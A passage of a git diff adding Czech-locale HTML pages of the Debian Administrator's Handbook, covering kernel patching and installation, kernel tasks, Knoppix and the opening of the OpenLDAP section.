+                    id="sect.kernel-patch"></a>8.10.6. Applying a Kernel Patch</h3></div></div></div><a
+            id="id-1.11.14.13.2"
+            class="indexterm"></a><a
+            id="id-1.11.14.13.3"
+            class="indexterm"></a><div
+            class="para">
+				Some features are not included in the standard kernel due to a lack of maturity or to some disagreement with the kernel maintainers. Such features may be distributed as patches that anyone is then free to apply to the kernel sources.
+			</div><div
+            class="para">
+				Debian sometimes provides some of these patches in <span
+              class="pkg pkg">linux-patch-*</span> packages but they often don't make it into stable releases (sometimes for the very same reasons that they are not merged into the official upstream kernel). These packages install files in the <code
+              class="filename">/usr/src/kernel-patches/</code> directory.
+			</div><div
+            class="para">
+				To apply one or more of these installed patches, use the <code
+              class="command">patch</code> command in the sources directory then start compilation of the kernel as described above.
+			</div><pre
+            class="screen">
+<code
+              class="computeroutput">$ </code><strong
+              class="userinput"><code>cd ~/kernel/linux-source-4.9</code></strong>
+<code
+              class="computeroutput">$ </code><strong
+              class="userinput"><code>make clean</code></strong>
+<code
+              class="computeroutput">$ </code><strong
+              class="userinput"><code>zcat /usr/src/kernel-patches/diffs/grsecurity2/grsecurity-3.1-4.9.11-201702181444.patch.gz | patch -p1</code></strong></pre><div
+            class="para">
+				Note that a given patch may not necessarily work with every version of the kernel; it is possible for <code
+              class="command">patch</code> to fail when applying them to kernel sources. An error message will be displayed and give some details about the failure; in this case, refer to the documentation available in the Debian package of the patch (in the <code
+              class="filename">/usr/share/doc/linux-patch-*/</code> directory). In most cases, the maintainer indicates for which kernel versions their patch is intended.
+			</div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.config-misc.html"><strong>Předcházející</strong>8.9. Other Configurations: Time Synchronization, ...</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.kernel-installation.html"><strong>Další</strong>8.11. Installing a Kernel</a></li></ul></body></html>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/sect.kernel-installation.html b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.kernel-installation.html
new file mode 100644
index 000000000..e91ebfd4c
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.kernel-installation.html
@@ -0,0 +1,135 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">8.11. Installing a Kernel</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Configuration, Localization, Locales, Network, Name resolution, Users, Groups, Accounts, Command-line interpreter, Shell, Printing, Bootloader, Kernel compiling" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="basic-configuration.html"
+        title="Kapitola 8. Basic Configuration: Network, Accounts, Printing..." /><link
+        rel="prev"
+        href="sect.kernel-compilation.html"
+        title="8.10. Compiling a Kernel" /><link
+        rel="next"
+        href="unix-services.html"
+        title="Kapitola 9. Unix Services" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.kernel-installation.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.kernel-compilation.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="unix-services.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.kernel-installation"></a>8.11. Installing a Kernel</h2></div></div></div><a
+          id="id-1.11.15.2"
+          class="indexterm"></a><a
+          id="id-1.11.15.3"
+          class="indexterm"></a><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.kernel-package"></a>8.11.1. Features of a Debian Kernel Package</h3></div></div></div><a
+            id="id-1.11.15.4.2"
+            class="indexterm"></a><div
+            class="para">
+				A Debian kernel package installs the kernel image (<code
+              class="filename">vmlinuz-<em
+                class="replaceable">version</em></code>), its configuration (<code
+              class="filename">config-<em
+                class="replaceable">version</em></code>) and its symbols table (<code
+              class="filename">System.map-<em
+                class="replaceable">version</em></code>) in <code
+              class="filename">/boot/</code>. The symbols table helps developers understand the meaning of a kernel error message; without it, kernel “oopses” (an “oops” is the kernel equivalent of a segmentation fault for user-space programs, in other words messages generated following an invalid pointer dereference) only contain numeric memory addresses, which is useless information without the table mapping these addresses to symbols and function names. The modules are installed in the <code
+              class="filename">/lib/modules/<em
+                class="replaceable">version</em>/</code> directory.
+			</div><div
+            class="para">
+				The package's configuration scripts automatically generate an initrd image, which is a mini-system designed to be loaded in memory (hence the name, which stands for “init ramdisk”) by the bootloader, and used by the Linux kernel solely for loading the modules needed to access the devices containing the complete Debian system (for example, the driver for SATA disks). Finally, the post-installation scripts update the symbolic links <code
+              class="filename">/vmlinuz</code>, <code
+              class="filename">/vmlinuz.old</code>, <code
+              class="filename">/initrd.img</code> and <code
+              class="filename">/initrd.img.old</code> so that they point to the latest two kernels installed, respectively, as well as the corresponding initrd images.
+			</div><div
+            class="para">
+				Most of those tasks are offloaded to hook scripts in the <code
+              class="filename">/etc/kernel/*.d/</code> directories. For instance, the integration with <code
+              class="command">grub</code> relies on <code
+              class="filename">/etc/kernel/postinst.d/zz-update-grub</code> and <code
+              class="filename">/etc/kernel/postrm.d/zz-update-grub</code> to call <code
+              class="command">update-grub</code> when kernels are installed or removed.
+			</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.kernel-installation-with-dpkg"></a>8.11.2. Installing with <code
+                    class="command">dpkg</code></h3></div></div></div><div
+            class="para">
+				Using <code
+              class="command">apt</code> is so convenient that it makes it easy to forget about the lower-level tools, but the easiest way of installing a compiled kernel is to use a command such as <code
+              class="command">dpkg -i <em
+                class="replaceable">package</em>.deb</code>, where <code
+              class="literal"><em
+                class="replaceable">package</em>.deb</code> is the name of a <span
+              class="pkg pkg">linux-image</span> package such as <code
+              class="filename">linux-image-4.9.30-ckt4-falcot_1_amd64.deb</code>.
+			</div><div
+            class="para">
+				The configuration steps described in this chapter are basic and can lead both to a server system or a workstation, and it can be massively duplicated in semi-automated ways. However, it is not enough by itself to provide a fully configured system. A few pieces are still in need of configuration, starting with low-level programs known as the “Unix services”.
+			</div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.kernel-compilation.html"><strong>Předcházející</strong>8.10. Compiling a Kernel</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="unix-services.html"><strong>Další</strong>Kapitola 9. Unix Services</a></li></ul></body></html>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/sect.kernel-role-and-tasks.html b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.kernel-role-and-tasks.html
new file mode 100644
index 000000000..cf1046e4c
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.kernel-role-and-tasks.html
@@ -0,0 +1,250 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">B.4. Some Tasks Handled by the Kernel</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="BIOS, Kernel, Unix, Process, Hierarchy, Basic Commands" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="short-remedial-course.html"
+        title="Příloha B. Short Remedial Course" /><link
+        rel="prev"
+        href="sect.computer-layers.html"
+        title="B.3. Inner Workings of a Computer: the Different Layers Involved" /><link
+        rel="next"
+        href="sect.user-space.html"
+        title="B.5. The User Space" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.kernel-role-and-tasks.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.computer-layers.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.user-space.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.kernel-role-and-tasks"></a>B.4. Some Tasks Handled by the Kernel</h2></div></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.hardware-drivers"></a>B.4.1. Driving the Hardware</h3></div></div></div><div
+            class="para">
+				The kernel is, first and foremost, tasked with controlling the hardware parts, detecting them, switching them on when the computer is powered on, and so on. It also makes them available to higher-level software with a simplified programming interface, so applications can take advantage of devices without having to worry about details such as which extension slot the option board is plugged into. The programming interface also provides an abstraction layer; this allows video-conferencing software, for example, to use a webcam independently of its make and model. The software can just use the <span
+              class="emphasis"><em>Video for Linux</em></span> (V4L) interface, and the kernel translates the function calls of this interface into the actual hardware commands needed by the specific webcam in use.
+			</div><div
+            class="para">
+				<a
+              id="id-1.21.7.2.3.1"
+              class="indexterm"></a> <a
+              id="id-1.21.7.2.3.2"
+              class="indexterm"></a> <a
+              id="id-1.21.7.2.3.3"
+              class="indexterm"></a> <a
+              id="id-1.21.7.2.3.4"
+              class="indexterm"></a> The kernel exports many details about detected hardware through the <code
+              class="filename">/proc/</code> and <code
+              class="filename">/sys/</code> virtual filesystems. Several tools summarize those details. Among them, <code
+              class="command">lspci</code> (in the <span
+              class="pkg pkg">pciutils</span> package) lists PCI devices, <code
+              class="command">lsusb</code> (in the <span
+              class="pkg pkg">usbutils</span> package) lists USB devices, and <code
+              class="command">lspcmcia</code> (in the <span
+              class="pkg pkg">pcmciautils</span> package) lists PCMCIA cards. These tools are very useful for identifying the exact model of a device. This identification also allows more precise searches on the web, which in turn, lead to more relevant documents.
+			</div><div
+            class="example"><a
+              xmlns=""
+              id="id-1.21.7.2.4"></a><p
+              class="title"><strong>Příklad B.1. Example of information provided by <code
+                  class="command">lspci</code> and <code
+                  class="command">lsusb</code></strong></p><div
+              class="example-contents"><pre
+                class="screen">
+<code
+                  class="computeroutput">$ </code><strong
+                  class="userinput"><code>lspci</code></strong>
+<code
+                  class="computeroutput">[...]
+00:02.1 Display controller: Intel Corporation Mobile 915GM/GMS/910GML Express Graphics Controller (rev 03)
+00:1c.0 PCI bridge: Intel Corporation 82801FB/FBM/FR/FW/FRW (ICH6 Family) PCI Express Port 1 (rev 03)
+00:1d.0 USB Controller: Intel Corporation 82801FB/FBM/FR/FW/FRW (ICH6 Family) USB UHCI #1 (rev 03)
+[...]
+01:00.0 Ethernet controller: Broadcom Corporation NetXtreme BCM5751 Gigabit Ethernet PCI Express (rev 01)
+02:03.0 Network controller: Intel Corporation PRO/Wireless 2200BG Network Connection (rev 05)
+$ </code><strong
+                  class="userinput"><code>lsusb</code></strong>
+<code
+                  class="computeroutput">Bus 005 Device 004: ID 413c:a005 Dell Computer Corp.
+Bus 005 Device 008: ID 413c:9001 Dell Computer Corp.
+Bus 005 Device 007: ID 045e:00dd Microsoft Corp.
+Bus 005 Device 006: ID 046d:c03d Logitech, Inc.
+[...]
+Bus 002 Device 004: ID 413c:8103 Dell Computer Corp. Wireless 350 Bluetooth
+</code></pre></div></div><div
+            class="para">
+				These programs have a <code
+              class="literal">-v</code> option, that lists much more detailed (but usually not necessary) information. Finally, the <code
+              class="command">lsdev</code> command (in the <span
+              class="pkg pkg">procinfo</span> package) lists communication resources used by devices.
+			</div><div
+            class="para">
+				Applications often access devices by way of special files created within <code
+              class="filename">/dev/</code> (see sidebar <a
+              class="xref"
+              href="sect.creating-accounts.html#sidebar.special-files"><span
+                class="emphasis"><em>BACK TO BASICS</em></span> Device access permissions</a>). These are special files that represent disk drives (for instance, <code
+              class="filename">/dev/hda</code> and <code
+              class="filename">/dev/sdc</code>), partitions (<code
+              class="filename">/dev/hda1</code> or <code
+              class="filename">/dev/sdc3</code>), mice (<code
+              class="filename">/dev/input/mouse0</code>), keyboards (<code
+              class="filename">/dev/input/event0</code>), soundcards (<code
+              class="filename">/dev/snd/*</code>), serial ports (<code
+              class="filename">/dev/ttyS*</code>), and so on.
+			</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.filesystems"></a>B.4.2. Filesystems</h3></div></div></div><a
+            id="id-1.21.7.3.2"
+            class="indexterm"></a><a
+            id="id-1.21.7.3.3"
+            class="indexterm"></a><div
+            class="para">
+				Filesystems are one of the most prominent aspects of the kernel. Unix systems merge all the file stores into a single hierarchy, which allows users (and applications) to access data simply by knowing its location within that hierarchy.
+			</div><div
+            class="para">
+				The starting point of this hierarchical tree is called the root, <code
+              class="filename">/</code>. This directory can contain named subdirectories. For instance, the <code
+              class="literal">home</code> subdirectory of <code
+              class="filename">/</code> is called <code
+              class="filename">/home/</code>. This subdirectory can, in turn, contain other subdirectories, and so on. Each directory can also contain files, where the actual data will be stored. Thus, the <code
+              class="filename">/home/rmas/Desktop/hello.txt</code> name refers to a file named <code
+              class="literal">hello.txt</code> stored in the <code
+              class="literal">Desktop</code> subdirectory of the <code
+              class="literal">rmas</code> subdirectory of the <code
+              class="literal">home</code> directory present in the root. The kernel translates between this naming system and the actual, physical storage on a disk.
+			</div><div
+            class="para">
+				Unlike other systems, there is only one such hierarchy, and it can integrate data from several disks. One of these disks is used as the root, and the others are “mounted” on directories in the hierarchy (the Unix command is called <code
+              class="command">mount</code>); these other disks are then available under these “mount points”. This allows storing users' home directories (traditionally stored within <code
+              class="filename">/home/</code>) on a second hard disk, which will contain the <code
+              class="literal">rhertzog</code> and <code
+              class="literal">rmas</code> directories. Once the disk is mounted on <code
+              class="filename">/home/</code>, these directories become accessible at their usual locations, and paths such as <code
+              class="filename">/home/rmas/Desktop/hello.txt</code> keep working.
+			</div><a
+            id="id-1.21.7.3.7"
+            class="indexterm"></a><div
+            class="para">
+				There are many filesystem formats, corresponding to many ways of physically storing data on disks. The most widely known are <span
+              class="emphasis"><em>ext2</em></span>, <span
+              class="emphasis"><em>ext3</em></span> and <span
+              class="emphasis"><em>ext4</em></span>, but others exist. For instance, <span
+              class="emphasis"><em>vfat</em></span> is the system that was historically used by DOS and Windows operating systems, which allows using hard disks under Debian as well as under Windows. In any case, a filesystem must be prepared on a disk before it can be mounted and this operation is known as “formatting”. Commands such as <code
+              class="command">mkfs.ext3</code> (where <code
+              class="command">mkfs</code> stands for <span
+              class="emphasis"><em>MaKe FileSystem</em></span>) handle formatting. These commands require, as a parameter, a device file representing the partition to be formatted (for instance, <code
+              class="filename">/dev/sda1</code>). This operation is destructive and should only be run once, except if one deliberately wishes to wipe a filesystem and start afresh.
+			</div><div
+            class="para">
+				There are also network filesystems, such as <acronym
+              class="acronym">NFS</acronym>, where data is not stored on a local disk. Instead, data is transmitted through the network to a server that stores and retrieves them on demand. The filesystem abstraction shields users from having to care: files remain accessible in their usual hierarchical way.
+			</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.shared-functions"></a>B.4.3. Shared Functions</h3></div></div></div><div
+            class="para">
+				Since a number of the same functions are used by all software, it makes sense to centralize them in the kernel. For instance, shared filesystem handling allows any application to simply open a file by name, without needing to worry where the file is stored physically. The file can be stored in several different slices on a hard disk, or split across several hard disks, or even stored on a remote file server. Shared communication functions are used by applications to exchange data independently of the way the data is transported. For instance, transport could be over any combination of local or wireless networks, or over a telephone landline.
+			</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.process-management"></a>B.4.4. Managing Processes</h3></div></div></div><a
+            id="id-1.21.7.5.2"
+            class="indexterm"></a><div
+            class="para">
+				A process is a running instance of a program. This requires memory to store both the program itself and its operating data. The kernel is in charge of creating and tracking them. When a program runs, the kernel first sets aside some memory, then loads the executable code from the filesystem into it, and then starts the code running. It keeps information about this process, the most visible of which is an identification number known as <span
+              class="emphasis"><em>pid</em></span> (<span
+              class="emphasis"><em>process identifier</em></span>).
+			</div><div
+            class="para">
+				Unix-like kernels (including Linux), like most other modern operating systems, are capable of “multi-tasking”. In other words, they allow running many processes “at the same time”. There is actually only one running process at any one time, but the kernel cuts time into small slices and runs each process in turn. Since these time slices are very short (in the millisecond range), they create the illusion of processes running in parallel, although they are actually only active during some time intervals and idle the rest of the time. The kernel's job is to adjust its scheduling mechanisms to keep that illusion, while maximizing the global system performance. If the time slices are too long, the application may not appear as responsive as desired. Too short, and the system loses time switching tasks too frequently. These decisions can be tweaked with process priorities. High-priority processes will run for longer and with more frequent time slices than low-priority processes.
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>NOTE</em></span> Multi-processor systems (and variants)</strong></p></div></div></div><div
+              class="para">
+				The limitation described above of only one process being able to run at a time, doesn't always apply. The actual restriction is that there can only be one running process <span
+                class="emphasis"><em>per processor core</em></span> at a time. Multi-processor, multi-core or “hyper-threaded” systems allow several processes to run in parallel. The same time-slicing system is still used, though, so as to handle cases where there are more active processes than available processor cores. This is far from unusual: a basic system, even a mostly idle one, almost always has tens of running processes.
+			</div></div><div
+            class="para">
+				Of course, the kernel allows running several independent instances of the same program. But each can only access its own time slices and memory. Their data thus remain independent.
+			</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.permissions"></a>B.4.5. Rights Management</h3></div></div></div><div
+            class="para">
+				Unix-like systems are also multi-user. They provide a rights management system that supports separate users and groups; it also allows control over actions based on permissions. The kernel manages data for each process, allowing it to control permissions. Most of the time, a process is identified by the user who started it. That process is only permitted to take those actions available to its owner. For instance, trying to open a file requires the kernel to check the process identity against access permissions (for more details on this particular example, see <a
+              class="xref"
+              href="sect.rights-management.html">9.3 – „Managing Rights“</a>).
+			</div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.computer-layers.html"><strong>Předcházející</strong>B.3. Inner Workings of a Computer: the Different ...</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.user-space.html"><strong>Další</strong>B.5. The User Space</a></li></ul></body></html>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/sect.knoppix.html b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.knoppix.html
new file mode 100644
index 000000000..711ce50ed
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.knoppix.html
@@ -0,0 +1,107 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">A.4. Knoppix</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Live CD, Specificities, Particular Choices" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="derivative-distributions.html"
+        title="Příloha A. Derivative Distributions" /><link
+        rel="prev"
+        href="sect.linux-mint.html"
+        title="A.3. Linux Mint" /><link
+        rel="next"
+        href="sect.aptosid.html"
+        title="A.5. Aptosid and Siduction" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.knoppix.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.linux-mint.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.aptosid.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.knoppix"></a>A.4. Knoppix</h2></div></div></div><a
+          id="id-1.20.7.2"
+          class="indexterm"></a><a
+          id="id-1.20.7.3"
+          class="indexterm"></a><a
+          id="id-1.20.7.4"
+          class="indexterm"></a><a
+          id="id-1.20.7.5"
+          class="indexterm"></a><div
+          class="para">
+			The Knoppix distribution barely needs an introduction. It was the first popular distribution to provide a <span
+            class="emphasis"><em>LiveCD</em></span>; in other words, a bootable CD-ROM that runs a turn-key Linux system with no requirement for a hard-disk — any system already installed on the machine will be left untouched. Automatic detection of available devices allows this distribution to work in most hardware configurations. The CD-ROM includes almost 2 GB of (compressed) software, and the DVD-ROM version has even more.
+		</div><div
+          class="para">
+			Combining this CD-ROM to a USB stick allows carrying your files with you, and to work on any computer without leaving a trace — remember that the distribution doesn't use the hard-disk at all. Knoppix uses LXDE (a lightweight graphical desktop) by default, but the DVD version also includes GNOME and Plasma. Many other distributions provide other combinations of desktops and software. This is, in part, made possible thanks to the <span
+            class="pkg pkg">live-build</span> Debian package that makes it relatively easy to create a LiveCD. <div
+            xmlns=""
+            class="url">→ <a
+              xmlns="http://www.w3.org/1999/xhtml"
+              href="http://live.debian.net/">http://live.debian.net/</a></div>
+		</div><a
+          id="id-1.20.7.8"
+          class="indexterm"></a><div
+          class="para">
+			Note that Knoppix also provides an installer: you can first try the distribution as a LiveCD, then install it on a hard-disk to get better performance. <div
+            xmlns=""
+            class="url">→ <a
+              xmlns="http://www.w3.org/1999/xhtml"
+              href="http://www.knopper.net/knoppix/index-en.html">http://www.knopper.net/knoppix/index-en.html</a></div>
+		</div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.linux-mint.html"><strong>Předcházející</strong>A.3. Linux Mint</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.aptosid.html"><strong>Další</strong>A.5. Aptosid and Siduction</a></li></ul></body></html>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/sect.ldap-directory.html b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.ldap-directory.html
new file mode 100644
index 000000000..1f4d98967
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.ldap-directory.html
@@ -0,0 +1,693 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">11.7. LDAP Directory</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Postfix, Apache, NFS, Samba, Squid, OpenLDAP, SIP" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="network-services.html"
+        title="Kapitola 11. Network Services: Postfix, Apache, NFS, Samba, Squid, LDAP, SIP, XMPP, TURN" /><link
+        rel="prev"
+        href="sect.http-ftp-proxy.html"
+        title="11.6. HTTP/FTP Proxy" /><link
+        rel="next"
+        href="sect.rtc-services.html"
+        title="11.8. Real-Time Communication Services" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.ldap-directory.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.http-ftp-proxy.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.rtc-services.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.ldap-directory"></a>11.7. LDAP Directory</h2></div></div></div><a
+          id="id-1.14.10.2"
+          class="indexterm"></a><a
+          id="id-1.14.10.3"
+          class="indexterm"></a><a
+          id="id-1.14.10.4"
+          class="indexterm"></a><div
+          class="para">
+			OpenLDAP is an implementation of the LDAP protocol; in other words, it is a special-purpose database designed for storing directories. In the most common use case, using an LDAP server allows centralizing management of user accounts and the related permissions. Moreover, an LDAP database is easily replicated, which allows setting up multiple synchronized LDAP servers. When the network and the user base grows quickly, the load can then be balanced across several servers.
+		</div><div
+          class="para">
+			LDAP data is structured and hierarchical. The structure is defined by “schemas” which describe the kind of objects that the database can store, with a list of all their possible attributes. The syntax used to refer to a particular object in the database is based on this structure, which explains its complexity.
+		</div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.14.10.7"></a>11.7.1. Installing</h3></div></div></div><div
+            class="para">
+				The <span
+              class="pkg pkg">slapd</span> package contains the OpenLDAP server. The <span
+              class="pkg pkg">ldap-utils</span> package includes command-line tools for interacting with LDAP servers.
+			</div><a
+            id="id-1.14.10.7.3"
+            class="indexterm"></a><div
+            class="para">
+				Installing <span
+              class="pkg pkg">slapd</span> usually asks very few questions and the resulting database is unlikely to suit your needs. Fortunately a simple <code
+              class="command">dpkg-reconfigure slapd</code> will let you reconfigure the LDAP database with more details:
+			</div><div
+            xmlns:d="http://docbook.org/ns/docbook"
+            class="itemizedlist"><ul><li
+                class="listitem"><div
+                  class="para">
+						Omit OpenLDAP server configuration? No, of course, we want to configure this service.
+					</div></li><li
+                class="listitem"><div
+                  class="para">
